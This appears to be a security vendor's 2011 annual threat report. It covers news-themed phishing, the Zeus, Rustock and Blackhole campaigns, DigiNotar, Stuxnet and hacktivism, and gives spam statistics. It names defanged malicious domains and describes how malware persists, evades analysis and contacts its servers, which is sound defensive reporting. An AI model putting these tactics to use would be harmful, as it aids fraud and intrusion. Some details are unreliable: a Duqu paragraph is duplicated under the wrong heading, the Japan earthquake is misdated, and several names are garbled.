Jump to content


VNR: 2011 Overview

Table of Contents

1. Overview

2. World Events

a.    Introduction
b.    The Earthquake in Japan, Flooding New Zealand
c.    Bin Laden's Death
d.    Gaddafi

3. Worldwide Web of Botnets

a.    Rustock Dismantled
b.    Zues
c.    A Challenger Appears-The Blackhole Toolkit
d.    Weyland-Tutani

4. Cybercrime and You

a.    Cost of personal Data Declines
b.    First Data
c.    IRS Tax Delays Help Time Malware
d.    Nacha and the Automated Clearing House
e.    Facebook Survey Scams
f.    Operation: Ghostclick

5. It's Not All About the Money

a.    Introduction
b.    Diginator
c.    Malware on a Mission
d.    Hacktivism

6. Total Email Traffic

7. Tests Failed

8. Regions of Origin

9. Top Ten Countries of Origin

10. Top Threats of 2011

11. Virus Traffic

12. Image Spam

      For this information in a PDF download, view our 2011 Overview (PDF) Click Here

1. Overview

2011 brought us a lot of varied activity in the realm of cyber security. World events helped steer a few large malware campaigns as Japan and New Zealand suffered major tragedies that kept the rest of the world hungry for any and all information on what was going on in those regions. This desire for information led some victims into malicious online traps.

Rustock, one the largest botnets of the past several years was silenced and dismantled, while Zeus and a few other families of malware continued on strong. What was realized this past year was that malware can be and is being used for far more nefarious purposes other than stealing bank accounts. The world was introduced to Stuxnet this past year, and along with it the idea that cyber warfare is more than just an idea. We had seen proof that this use for cyber-attacks was in its infancy or just on the horizon, but as Stuxnet was analyzed and its intentions realized, so was the idea that cyber warfare has officially arrived.

This report is designed to highlight some of the major stories and events that occurred during the year 2011, as well as give actual metrics of these events as seen by AppRiver filters.

2. World Events

World events have been an ongoing and never-ending pattern for the world of cybercrime. The moment that a tragedy occurs and draws the attention of a major portion of society, those with mal-intent immediately begin trying to capitalize on the events by feeding the Internet with their own versions of these news stories complete with information and money-stealing malware. Their favorite vectors for attack in this manner are both through SEO poisoning as well as major malicious email blasts.

2b. The Earthquake in Japan, Flooding in New Zealand

Japan was hit hard in April 2011 with several large earthquakes that spawned a devastating tsunami and tragically took many lives. Japan is still facing issues with damage to its Fukushima Daiichi nuclear power plant that is causing radiation leakage from overheated spent fuel rods at the plant. Cyber criminals have decided that these events were a perfect opportunity to take advantage of those with concern. Emails began circulating mid-month, claiming to have come from the British Red Cross and attempted to gather money from people whose intentions were to help the victims. This was exactly like the events that followed the earthquake in New Zealand barely two weeks beforehand. A number of fake charity sites popped up, most notably sites that mimicked the Red Cross attempting to add a look of legitimacy to their scams. These fake Red Cross sites appeared to be the New Zealand Red Cross in the case of the Christchurch tragedies, and The UK Red Cross or Japanese Red Crescent in the wake of the disasters in Japan. Unfortunately, anyone who donated would have become victims themselves. The emails gave brief news tidbits of the catastrophes and claimed that, "The Japanese Red Cross has agreed to accept donations from the UK". They also offered a way to "donate" to their cause via a Moneybookers account, which is a cash intermediary site that brokers money deals through the internet similar to PayPal. People can apply money towards a person's account and that person can nearly anonymously retrieve the money without much of a trace. These emails offered a yahoo email address to which to donate. This should've been a big red flag to those who are watching out as any legitimate charity would use an email address at their own domain, not to mention that they would also more likely steer you to their site via a secure connection through which to make any donations. That is if they were to spam out requests for donations in the first place. Keep a level head and research any and all charities before handing over your money.

Other scams that quickly followed these claimed to have actual video content of the tsunami in Japan and were delivered in several email formats. These included sloppy plain text emails that contained supposed links to the videos, emails designed to look like Twitter email notifications, and emails pretending to be notifications from CNN. Unlike the fake charity pages where victims would unknowingly give their money directly to the scammers, these video themed attacks would place malware on the victims' PCs thusly giving the attackers direct access to whatever they wanted whether it be account information and credentials to making the target a part of a remotely controlled bot network.

We have seen samples of the "breaking news" CNN-formatted email in the past and observed the technique to be quite effective on a large scale. Most notably, and back in August of 2008 through late in 2009 when it was a very popular theme often associated with the Storm Worm and was used to trick recipients into believing that they were receiving legitimate news notifications. The subjects ranged from the ridiculous, "Olympic Athletes Bare All" to the political, "McCain Lawyers Impeach Obama" to the (what was) current in pop culture, "Listen Online Now," which led viewers to what was supposedly a sneak peek at a newly released Michael Jackson song shortly after his death.

2c. Bin Laden's Death

Immediately following the news of Osama Bin Laden's death, Bin Laden-themed scams and malware began circulating through the Web. As is usual following a large news event, scammers rode the coattails of the news with fake news stories of their own, hoping to lure in click-happy, news-hungry victims. The first place we began to see messages appear was on Facebook. It began as a Wall post from a friend claiming that they had a link to video footage of the ordeal. After clicking on the link, the recipient was instructed to jump through several hoops including filling out a fake survey and copy and pasting Javascript into their browsers. If this last one doesn't sound like a completely terrible thing to do, know from now on that it completely is.

The code would cause the victims' Facebook accounts to "Like" the malicious page and begin secretly posting copies of the link to all of their friends perpetuating the infection. At the end of the survey it was requested that participants enter their cell phone numbers to receive their results. The fine print claims that this would result in a $10 charge on your cell phone bill. It's not clear whether or not this was just a one-time charge, or something that would secretly keep recurring.

Along with this Facebook scam, we were also seeing Bin Laden-themed emails that were aimed at inboxes. The first run of these we saw were in Portuguese and translated to: "After the pronouncement of the death of Osama Bin Laden several pictures of the body were released on the internet. According to American newspapers are not all real." The email had an attachment that was supposed to contain the photos titled "FOTOS.Terroris.zip". This file was obviously not photos, but instead a banking Trojan designed to steal bank account credentials, and eventually victims' money.

2d. Gaddafi

2011 witnessed government uprising in Egypt, Syria, and Iran, just to name a few. But perhaps the most notable news came from Libya due to Muammar Gaddafi and his 58-year dictatorship over the Libyan people. This was to be followed by his swift overthrow and eventual death two months later in October. Early on in the events we began seeing a large amount of unwanted email using the subject matter in an attempt to entice recipients to open spam emails. Subject lines read, "VIDEO: Rebels target Gaddafi's home town", "VIDEO: Inside Gaddafi's ransacked compound," and "Gaddafi 'still threat' for Libya," while contents included everything from the run-of-the-mill Viagra ads to Libyan revolution-themed 419 scams.

After a final standoff in Sirte on October 20th, Libya's former leader was captured and killed. The underground market saw this as another opportunity to deliver malware. Not only did we see emails pretending to come from fake news sources, but also saw a few that purported to come from Gaddafi's sons. One in particular supposedly had contained a .Wmv clip of Gaddafi immediately following his capture. The email was written in Portuguese much like the Bin Laden malware from earlier, and said "VEJA OS VIDEOS DO CORPO DE MUAMMAR GADDAFI,APÃ"S SER CAPTURADO PELOS REBELDES", which translates into "See the videos of the body of Muammar Gaddafi, after being captured by rebels". The attachment appeared to be a Windows Media File, but was instead an .Scr file named "fotosweb.scr" which itself was a standalone executable. Once executed the malware would add itself to the system registry's RUN path to make sure it ran every time the computer restarted, and then promptly hid itself in the file system. The malware then made a standard http call from port 80 to a Dropbox account which was down at the time of testing so we were unable to verify what further malware that it was planning on pulling down.

3. Worldwide Web of Botnets

3a. Rustock Dismantled

The Rustock botnet had been making headlines for the past several years, famous for being the largest spam producing botnet out there (AppRiver would typically see an average of 50 million pieces of spam from the Rustock bots on a daily basis). But back in December of 2010, Rustock drew the attention of security professionals by going on hiatus. There seemed to be no rhyme or reason for its departure, while Rustock Christmas-related email traffic came to a halt. It was theorized that perhaps the group operating the botnet was performing some sort of maintenance or perhaps relocating their command and control servers, though it isn't common for a botnet to completely shut down while these tasks are performed as it is essentially unnecessary. Perhaps the Rustock crew had begun to feel some heat from the investigations that we now know were taking place at the time, and suddenly pulled the plug. If this were the case they must've felt like maybe the coast was clear because just a few weeks later Rustock powered back up as if nothing ever happened.

Operations continued for months, from January and to March 16th when Microsoft, armed with their research and critical research from FireEye, and the Dutch High Tech Crime Unit, led the charge on 7 different U.S.-based hosting providers that housed Rustock's command and control servers with help from the U.S. Marshals. These C&C machines were located in Kansas City, Denver, Seattle, Chicago, Dallas, Scranton, and Columbus, Ohio. Microsoft carried with them a court ordered right to seize any and all machines linked to Rustock. Almost immediately the effects of the operation were noticed as the millions of bots infected with Rustock stopped receiving orders and fell silent. Spam volumes dropped nearly 35% as indicated by our filters. This mission seems to have been very effective as we haven't heard a peep from Rustock, and may have more success in the near future as Microsoft is pouring through the data they've newly collected and aims on finding the people in charge of this botnet. Currently no one has been cited in association with Rustock.

3b. Zeus

Even though the creator of the Zeus banking Trojan/toolkit announced that he had given up his code of the now ubiquitous Trojan to the creator of then rival SpyEye back in January, we are still seeing plenty of campaigns that match Zeus' footprint. These are likely from Zeus kits that remained in the wild after the supposed underground code merger took place. We've seen all sorts of themes over the past year including the tried and true fake delivery receipts supposedly coming from such companies as DHL, FedEx and UPS. The attachments in many of these emails almost always contained one of a few popular Trojan downloaders known throughout as Pushdo, Kryptik, Delphi, Bredo, Sasfis, or Oficla, some of these names are synonymous. These downloaders then lead to Scareware versions of Anti-Virus, or even then to the phishing kits such as Zeus or even most recently SpyEye.

Back in May we saw a ploy by Zeus to trick people into believing that it was a security update from Microsoft, and then another set of back to back campaigns in July also pretending to be messages from the National Security Association, as well as the Board of Governors of the Federal Reserve System. Both were urging recipients to install fake system security updates. Instead of stronger security, victims of this scam would be infected with yet another variant of the ZeuS Trojan.

Another very popular ploy used by Zeus this past year has been to imitate Nacha an organization associated with regulating Automated Clearing Houses for electronic transactions such as insurance premiums and mortgage loans.

Most recently though, we have been seeing Zeus pretending to be the Chamber of Commerce. The campaign utilized a stolen banner complete with the Chamber's logo as well as a footer that gave the Chamber's address and other information. The somewhat cryptic message suggested that readers may have had a good, mutually beneficial, professional partnership for the recipient's business, and all of the pertinent info was supplied in the attachment "USChamber[dot]zip".

The attachment was of course a rather aggressive piece of malware that would open a backdoor onto the victim's system in order to begin to download further malicious payloads once it was established. Once it had a foothold, it would attempt to contact two other domains - jokeins[dot]com and agrofond[dot]com. From both of these places it would then make a "GET" request for a file by the name of start[dot]exe. This file was the ever-popular and ubiquitous Zeus. Once Zeus began to run, it would spawn a process by the name of miuf[dot]exe which in turn launched a keylogger and then started trying to make many outbound connections in classic Zeus style by pinging a different pseudo-random domain name every couple of seconds on port 80 until it found one that was active from which to receive instructions, these are domains such as gzdyhtiyhxbve21d10mvdrjtbzftpucyjq[dot]org.

Zeus also sent out a handful of UDP packets to an equal number of unique IP addresses each with 72 bytes of data. These were originating from random local ports to a destination port unique to the recipient IP address. This was possibly to announce itself to other members of the botnet that the victim would then belong to.

3c. A Challenger Appears - The Blackhole Toolkit

It has been a very familiar sight to see emails with malicious attachments pretending to be from popular shipping companies, like fake IRS notifications or other similar ploys. Most of these are courtesy of the Zeus trojan, an easily recognizable kit born trojan hell bent on stealing banking information from unsuspecting victims. Zeus has been around for quite some time now, and due to its ease of accessibility on the underground forums, it has spread quite rapidly in the wild.

Lately, though, a lesser known toolkit by the name of Blackhole has gained in popularity. The Blackhole toolkit was released into the underground market less than a year ago and was being sold for around $1500 US per yearly license which included support. The cost was enough to keep the rookies away and allowed operators of the new toolkit to operate relatively under the radar. That is until May of this past year when the kit was made available for free in many locations. Since then we have seen a steady increase in the number of infections for which this kit is responsible.

Initially, Blackhole would simply infect legitimate websites with the proper vulnerabilities which passersby would visit and become infected via drive-by download. Now, however, an email component has been added to increase traffic to these sites which instead of being only legitimate compromised sites primarily now include a slew of random sites set up for the sole purpose of snaring victims. Early in October, after the passing of Steve Jobs, we began to see emails, claiming through a few varied subject lines, that Apple's co-creator was indeed still alive. These emails contained a link to the "Hot News". Once readers clicked on the link they were led to one of thousands of web pages that were infected by the Blackhole toolkit. The infected site would then begin running an obfuscated Javascript which would look for vulnerabilities on the system of the new visitor. It would then exploit those vulnerabilities to infect them and install a backdoor on their system.

More recently we began seeing a new campaign linked to the Blackhole kit, with a new batch of domains also associated. These emails were made to look like an automated email notification from a Hewlett-Packard OfficeJet Printer. The email purported that a document was scanned and sent to the recipient, and even offered handy links from which to view them. The links did then what anyone would now expect, and ship the unfortunate person to more infected web sites. This time, sites included an element that attempted to launch a Java routine in addition to its normal attack, which is hidden in more obfuscated Javascript. At the time, we saw well over 1500 domains serving up this Blackhole toolkit created malware, and over 4.5 million pieces of email at a rate of 30,000 per minute hitting our filters related to this particular campaign. There have been several newer campaigns since this one which may signal the fact that Blackhole may be around for a while.

3d. Weyland-Yutani

The month of May brought a new equal opportunity malware kit that is now being offered online in the underground forums. It goes by the name of Weyland-Yutani Bot, which was taken from the fictional company from the movie Aliens. Weyland-Yutani has a very interesting feature built in, and that is the ability to automatically create scripts designed to infect both PC and Mac machines. Mac malware has been around for a while, though it has yet until now been available as a kit. Kits are written so that you can just add a couple of customizations, hit "Go" and it will create custom malware for even the minimally technical. The kit was selling for 1000 credits WebMoney which exchanges to about $1065 US, and the authors have guaranteed the addition of iPad and Linux scripts in the very near future. Imagine when a user can browse past an infected site and become a victim regardless of their operating system. To best avoid these situations, internet goers should keep all of their software up to date, especially their OS as well as their browsers as these are often the first targets. Don't discount the rest of your software, which needs to be handled appropriately too, including the removal of unnecessary software, and the use of multiple layers of security with antivirus and a firewall. Safe browsing habits don't hurt either.

4. Cybercrime and You

4a. Cost of Personal Data Declines

In the very beginning, the reason for the creation of the computer virus was mainly for pranking one's adversaries or peers across shoddy low baud telephone line connections. In the days of the BBS, or Bulletin Board System, users would dial in to servers housed in spare bedrooms and basements. The popular ones would pay to have several extra phone lines in to the house so multiple people could connect at one time. On these places of wonderment and ASCII art, these small communities would play text-based games, share files and ideas. It wasn't long however, before people started becoming cage brave, and taunting one another. Short scripts would be written that would boot other users off of the board by breaking their connections, keyboards would be re-mapped so that the "Y" was the "N" and vice versa, so when they were prompted with the question "You are about to format your C: drive, proceed?" The unsuspecting victim would unknowingly answer "Yes" when they pressed the "N" key for "No".

Things have changed drastically since those days, which in actuality really weren't that long ago. Nowadays, malware is about collecting personal information, and ultimately victims' money. No longer do they want their targets to know of their existence, they prefer to remain hidden so no one will be the wiser as they are siphoning off data, and using the infected machine to continue to do their bidding. The whole underground economy runs much like that of the legal business world it operates alongside of. Certain people play different roles, and have different specialties in the whole cybercrime game. The business front of the underground economy, or Dark Market as it has also been called, comes in the form of your basic online forum or IRC channel. These pop up and shutdown all of the time, sometimes just simply moving from place to place in order to remain out of sight. On these forums people Buy, Sell and Trade items of mal-intent. This also happens to be the places where someone who was perhaps interested in fencing stolen electronics would come to purchase sets of credit card numbers they would then use to make their purchases with someone else's money. These sets of credit cards usually come with a sort of guarantee that the accounts are still active and priced by what country the accounts reside in, as well as how much money is in the accounts. These also include the cardholder's name, address, date of birth, and Social Security Number (where applicable), and are referred to as "Fulls". This is every piece of information a criminal would need to know in order to easily make a successful online purchase with some else's identity.

Just one year ago the price of these "Fulls" were around $10-$12 each for an active US based identity. Currently these same "Fulls" are going for as low as $2 each with an average around $6-$7 each. Also, the forums that sell these things tend to stock 10's of thousands at any given time. This is a bad sign for the innocent. This rapid drop in price isn't caused by lack of demand; it's due to the flooding of the market with stolen personal private data. With the proliferation of data stealing kits such as Zeus, Blackhole and SpyEye, it is getting ever easier for even the most novice cyber thief to break your bank.

4b. First Data

People that use malware to steal personal information go about it in many different ways. Sometimes they get creative. On the 25th of January we saw a rather alarming technique for stealing money without having to go to the card holder. These attacks were aimed at merchants; in particular, those who use merchant services company First Data. The company is one of many that provide credit card processing services for merchants, the go between from restaurant server or retail clerk and your actual credit card issuer. According to First Data's website, they provide merchant services to more than 6 million locations, thousands of card issuers, and millions of customers worldwide. The January scam began with an email that contained an .html attachment (essentially attaching a webpage instead of providing the usual link to a remotely hosted one). After opening the page, the merchant is asked to provide some key information, such as their store number, user ID, tax ID, and password. This is all of the essential information to gain access to the merchant's account. Once the hacker has gained access to the First Data account, they would have likely gained control over that specific merchant's account. It was unclear whether or not this breech would have exposed any of the merchant's customer records, but it is a distinct risk and possibility, making this an attack with a much broader possibility for impact.

4c. IRS Tax Delays Help Time Malware

Cybercriminals are always eager to exploit any angle possible when it serves their interests and helps them to spread their malware to as many individual's computers as possible. On February 15th of 2011 we began seeing a malware campaign that was at the very least well timed and fairly well crafted. The messages claimed that "Your Federal Tax Payment has been Rejected", and the attachment that accompanied it was another offering by Zeus. Messages claiming to come from the IRS are nothing new, but this is perhaps the most uniquely well timed attack that we have seen. Since the U.S. government waited until the last minute to extend tax cuts at the end of 2010, the IRS was unable to accept millions of tax returns until February 14th. Every individual claiming certain deductions and using tax software to e-file their return would have had their tax return held by the tax preparation company (TurboTax, Taxact, H&R Block, etc..) until Feb. 14th ,then sent automatically, when the IRS would be ready to accept those returns. Most of these individuals would have received an email as their taxes were submitted stating that their tax return had been "sent" to the IRS and that they would receive another email confirmation once the return had been "accepted" by the IRS. In other words, millions of Americans were likely expecting to hear whether or not their tax return had been accepted or rejected via email within the following 48 hour period, so this attack could have really not be better timed. Of course the legitimate email would have come from the Tax Preparation Company that was used to file and not from the IRS directly. The IRS does not ask for personal identifying or financial information via unsolicited e-mail.

4d. Nacha and the Automated Clearing House

Nacha seemed like an interesting target when we first began to see it being used in malware campaigns by Zeus early in August, but instead of being a shot in the dark, one time theme, we saw it being used again and again through the last quarter of 2011. During the last week of August, the second time we saw Nacha being used, we saw nearly 3 million pieces in about 12 hours. NACHA is a non-profit group that provides rules and regulations for electronic transactions such as insurance premiums, mortgage loans, and as they say on their site "the backbone for the electronic movement of money and data." The second run that month used emails that were a little less decorated than the ones we saw previously that month, but they used the same basic ploy. They claimed that a payment transaction had been cancelled, which can be a very big deal if that's someone's mortgage payment attempting to traverse the wires. Something like that could certainly cause someone to panic in a time of recession and foreclosure. These messages were certainly fakes, but the threat was cause for alarm.

The attachment, "report_082011&-65.pdf.exe", was a busy one once executed. It began by checking its environment to see if it was running in a debugging program, a sort of self-defense mechanism which it used to avoid being analyzed by those pesky AV people. After that it injected itself into running processes in true rootkit fashion, and deleted its original file, seemingly disappearing into the ether. Unfortunately though, it did not. It, by the way, was a downloader that brought its friend Zeus to the party. It did so by spawning several processes, including one that reached out first to a Google IP to check for network connectivity, and then to a pseudo-random domain name, in this case qimqzrtpkmukd[dot]com at, in order to connect to its command and control server. Once the connection was made, the victim machine became infected with Zeus, became part of a botnet, and the controller could then continue to push down further malware and tap off information as they pleased. Stay away from unwanted emails from unknown senders, and always question alerts that claim packages couldn't be delivered, transactions have failed, your password needs to be changed, or anything that would require you to open an attachment or enter personal information in order to be viewed.

4e. Facebook Survey Scams

More and more now we're all becoming familiar with Facebook scams and malware. These are the ones where someone will see a post from their friend that touts a strange, sexy, or news oriented video with a comment about it that leaves just enough to the imagination to entice people into clicking on the link. The current most popular line of attack is the survey scam, and we certainly saw a lot of them this past year. These will taunt viewers with one of the aforementioned videos and will lead them instead through a survey that they must take in order to get to what they want. At the end of a usually short line of questioning the reader is tricked into receiving the answer by text. By agreeing to this, they are then hooked into a $2 dollar per text fee which the "service" will then begin sending on a regular basis.

A lot of the time the subject of these videos is just something odd, or vague, such as one that claimed to be a video of a girl with a spider living under her skin. Others go the route of "You've got to see this!", or "I can't believe what you were doing in this video". More so lately it seems that these scams are using another old tried and true tactic by utilizing current events in order to spread faster, such as the aforementioned, claiming to be video of Osama Bin Laden's death. We also saw scammers praying off of people who were attempting to learn information about the bombings in Oslo back in July. This one started appearing just hours after the event had happened in Norway. Equally as punctual we saw some immediately following the announcement of the death of Amy Winehouse claiming to be video of her smoking crack just before her reported death. These show no sign of stopping, and can sometimes catch a person off guard. Stay aware, and question links that seem a little off to avoid these scams.

4f. Operation: Ghostclick

On Wednesday November 9th, 2011, we can chalk up another one for the good guys in the cyber crime realm. On this day, the FBI officially announced that a group of 6 Estonians had been arrested and charged with a cyber scheme that had begun in 2007 and netted the criminals more than $14 million. The campaign had been dubbed "Operation:GhostClick"

The group managed to set up several Publisher Networks which can be, though not in this case, legitimate third party companies that web site owners hire to fill their ad space while they worry about their own content. Advertisers will approach these companies to help sell their ads to web sites. These third party companies then often band together and form networks through which they share ads between themselves and their specific clientele. When an ad is clicked, everyone down the line gets their fair share. Unfortunately for legitimate advertisers, this group was not collecting their fair share, but instead generating millions of unique clicks from stolen sources.

The fraud ring used a combination of two techniques to accomplish their goals. One was Click-jacking, and the other, Advertising Replacement Fraud. First, Click-jacking occurs when someone browsing a website intends on clicking on a link or an ad that they're interested in, but when they do they are instead re-routed to a different website. For example, in this case, one of the ads offered up to browsers was a link to the official iTunes Store (a hover over with the mouse would show the legitimate site as well); however when users clicked on the link, it would then take them to false Apple sites instead. At this point the "click" would be counted towards the fake site where the users ended up, and therefore generated money to the fraud ring.

Advertisement Replacement Fraud occurs when legitimate ads on legitimate sites are instead replaced with ads that the criminals want to display instead. This is used to place the fraudulent ads on popular high volume websites where the chances of click-throughs rise exponentially. For example, the ad for the American Express "Plum Card" on the home page of the Wall Street Journal was replaced with an ad for "Fashion Girl LA". Clicks on these links also generated cash for the bad guys.

This group was able to accomplish all of this by infecting their victims' computers with malware designed to alter their DNS settings. The Domain Name System is essentially the telephone book of the Internet. Computers don't necessarily know how to get to www.google.com for example, instead, when a user types it into their browser, their computer will then take a look at their local DNS entry for Google.com and see that it actually resides at the IP address of (or one of several others). From there it can direct the browsers to the correct place. The bad guys were able to point their victims to DNS servers that contained improper IP addresses for legitimate sites, thereby sending victims through their fake sites, which in turn generated money for them in the form of advertising clicks, instead of sending victims to where they actually intended on ending up.

The FBI has estimated that over 4 million computers were infected by this group in 100 different countries, with at least 500,000 in the US alone. The FBI has offered this document to tell if your DNS settings have been altered:


If they have though, simply changing them won't be enough, as the malware used to change them in the first place will likely still be on the infected machine. The malware prevented the installation of new anti-virus and operating system updates on its host machine in order to allow it to remain functional. The best bet for victims is to make sure that their local anti-virus is up to date and attempt a scan and clean on their systems. It may also be a good idea to try to attempt a third party web-based anti-virus scan on their machine, making sure the proper DNS settings are in place at the time.

5. It's Not Just About the Money

In the previous section, Cybercrime and You, it is mentioned that cybercriminals only have one thing on their mind, and that is separating their victims from their money. But what happens when an attack is state sponsored, or there's something else on the minds of the instigators? What if they just have a message that they want to get out? There were several occurrences during the year 2011 that made the IT Security community stand up and take notice. Computers are powerful tools, and the fact that entire countries, their economies, and their militaries rely on them and rely on them being connected make them even more powerful tools in this day and age. Here are a few events from 2011 that help to paint this picture.

5b. Diginator

Thanks to a breach into the Certificate Authority company DigiNotar's systems earlier this year; hackers were able to create fraudulent SSL certificates in this once trusted company's name. The certificates were setup to appear to be for Google. They were designed to trick web browsers into believing that they were talking to legitimate Google domains when in actuality they were the victims of a man-in-the-middle attack. The attacker would present these fake certificates to people attempting to access Google domains and services such as Gmail , and the victim would trust the fake Google certificate and connect believing they were talking to Google. Once the initial connection was made, the attacker would then forward the requests on to the actual Google site positioning themselves in between the communications. This way the attacker would be able to monitor all exchanges in both directions between Google and its victims.

The attack was used to eavesdrop on over 300,000 Iranians via their Gmail accounts. Interestingly enough, Iran's own government was suspected as the attacker as they were supposedly keeping tabs on activists and protestors. The company that did the majority of the research into the breach, Fox-IT, claim that of the over 300,000 IPs that accessed the fake certificates, over 99% of them originated in Iran, making these people the obvious target of a directed attack

Google wasn't the only domain falsified in the certificates, according to the research group, over 500 fake certificates were issued and possibly abused during the several weeks that DigiNotar was breached and before they had realized it. DigiNotar has since filed for bankruptcy after being removed from trusted certificate lists by all of the major browser companies.

5c. Malware on a Mission

One of the biggest stories to hit the community was with the discovery of Stuxnet. Stuxnet was in actuality discovered in June of 2010, but details of its true intent were not discovered until 2011 due to its highly specialized code. It was found that Stuxnet had a very specific mission, and that was spread as a worm until it found equipment manufactured by the Siemens, specifically their SCADA systems. It was found that different variants of Stuxnet found their way into 5 different Iranian facilities used to enrich uranium rods. The worm was able to make its way into the facilities, which was an amazing first feat, as these buildings were air-gapped networks, meaning they had no outside connections for the worm to travel through. This also means that likely the worm was carried into the compounds by workers, possibly on infected thumbdrives. After, Stuxnet made it inside, it would seek out the machines that were in charge of monitoring and controlling the PLC devices that operated the industrial centrifuges. It would alter their rotation ever so slightly at critical times in order to botch the enrichment process. The worm would also alter logging by the device so the subtle change would never be measured.

Later on in September of 2011, another computer worm was found crawling around the internet. This one was called Duqu. Duqu gained quick notoriety as it was found to share some code with Stuxnet. Duqu masqueraded as Microsoft Word documents and targeted seemingly specific targets in eight countries also in the Middle East. These documents once opened exploited a vulnerability in MS Word's WIN32k TrueType font parsing engine. It's eventual goal has not been released as public knowledge as of yet.

5d. Hacktivism

Later on in September of 2011, another computer worm was found crawling around the internet. This one was called Duqu. Duqu gained quick notoriety as it was found to share some code with Stuxnet. Duqu masqueraded as Microsoft Word documents and targeted seemingly specific targets in eight countries also in the Middle East. These documents once opened exploited a vulnerability in MS Word's WIN32k TrueType font parsing engine. It's eventual goal has not been released as public knowledge as of yet.

A lot of the people on the Internet began following LulzSec and even siding with them as if they were a sort of Robin Hood of the Internet by pointing out big corporations and big government didn't take care of sensitive information to the degree that they should. The only thing is that they exposed private information of hundreds of thousands of otherwise innocent people who had nothing to do with their "cause". It is one thing to point out flaws in security when done in a proper ethical manner, this is another.

Yet another group of hackers made quick headlines in September. They called themselves "Script Kiddies'. The term Script Kiddie is a term used to describe people that don't know enough about coding or hacking to create attacks on their own, but instead take scripts written by other people and use them as if they know how. It's a term usually used as an insult to the "noobs" of the craft, but this group is actually referring to themselves as the Script Kiddies, and just as their namesakes annoy people who know what they're doing, this group was for a moment creating plenty of annoyance as well. The group first came to light when they broke into the Facebook account of big drug company Pfizer, defaced it, and took credit for it on their newly created Twitter account. On September 9th they broke into the NBC News Twitter account and began posting tweets that another terrorist attack was occurring at the ground zero site just two days before the 10th anniversary of the original 9/11 attacks. This time they altered the NBC News Twitter account to read "Hacked by Script Kiddies". Since then they have also hacked the Twitter account of the Wall Street Journal where they asked people to vote for what entity that they would hack next, very similar to the boasting ways of the recently defunct group LulzSec. The group has also claimed responsibility for another Twitter breach that occurred back in July. This one was that of Fox News where they made several posts claiming that Barrack Obama had died. These groups are most certainly gaining their courage from the infamy of the aforementioned LulzSec and Anonymous "hactivism" attacks, but they may want to note that these people are being caught and put in jail left and right.

Finally, another group to make consistent big headlines in 2011 was the group simply called Anonymous. Anonymous has been known in the past for its heavy use of the Guy Fawkes mask, and rallying its supporters to help DDoS, (Distributed Denial of Service Attacks), targets that they had some sort of disagreement with. Initially it seemed like this group consisted of a lot of different subsets that all felt like they were part of the whole, some more aggressive than others, but the group seems to have gathered some leadership and is quick to call out people making claims in their name, that are not actually part of the official Anonymous movement. Their main cause now seems to be protest and a sort of cyber civil disobedience. Anonymous had a big part in helping rally people to the Occupy Wall Street Movements.

6. Total Email Traffic Volume

This first chart blow represents both total and spam traffic throughout the past twelve months and the second chart represents spam messages as a percentage of total email traffic. While spam traffic dipped throughout mid-year it has been on the rise throughout Q4 of 2011. In the past year we processed 37.5 billion messages of which 33.4 billion were spam.

In the past year spam traffic accounted for (on average) 88.8 percent of all email traffic.

7. Tests Failed

This chart represents the number of times messages failed various tests over the past 12 months. Keep in mind that many messages failed multiple tests; hence the total from these charts will surpass the total individual pieces of spam seen during the period.

8. Regions of Origin

This graph represents both spam and malicious email traffic by region. In 2011, Asia overtook Europe as the top spam producing region.

9. Top Ten Countries of Origin

This chart represents the top countries from which spam originated during the past 12 months. Once again the United States reigned supreme as the top country for spam origination. For the first time we also saw the UK fall out of the top ten.

10. Top Email-Delivered Viral Threats

These are the top 20 malware threats we saw last month in order of frequency, with the most frequent appearing in the top position. The virus names that begin with "X." signify rules that were written by AppRiver Analysts. (This doesn't mean that other anti-virus vendors didn't eventually have definitions in place for these viruses; it simply means that AppRiver often had protection in place before many of them).

  • X.W32.Sasfis.pak
  • X.UPX.App.pakuber
  • X.W32.Kryptik.CTR.pak
  • X.W32.PX.pakc
  • X.W32.PX.pakb
  • X.W32.Kryp.farca
  • X.UPX.App.pakuberb
  • X.W32.PECxt.a
  • X.Troj\Invo-Zipreport.ks
  • X.W32.Kazy.pak
  • X.Troj\Invo-Zip.9.14repor
  • X.W32.Crypt.ZPACK.Genb
  • X.W32\docPak
  • X.W32.Kryp.1115
  • X.Troj\Zipreport.ndg20110
  • X.W32.Dropper.Pij.gen
  • X.W32\Kryptik.RZB.ACh
  • X.Trojanmypic.zip.5.15JRa
  • X.Hiden.Troj.ndg1114a
  • X.Troj\FakeAV-ENL.ac

11. Twelve-Month Virus Activity

This chart represents email-borne virus as seen inbound to our filters. There were some very concerning spikes in virus traffic this year. August and September brought with them some of the largest single day spikes we have seen to date. Some of the daily spikes drove virus traffic to 25 percent of all message traffic. During the past year, we quarantined over 670 million email-borne viruses.

12. Image Spam

The chart below represents total Image spam seen by AppRiver filters during the past 12 months. The obfuscation method of using images containing spam content remained level throughout the year.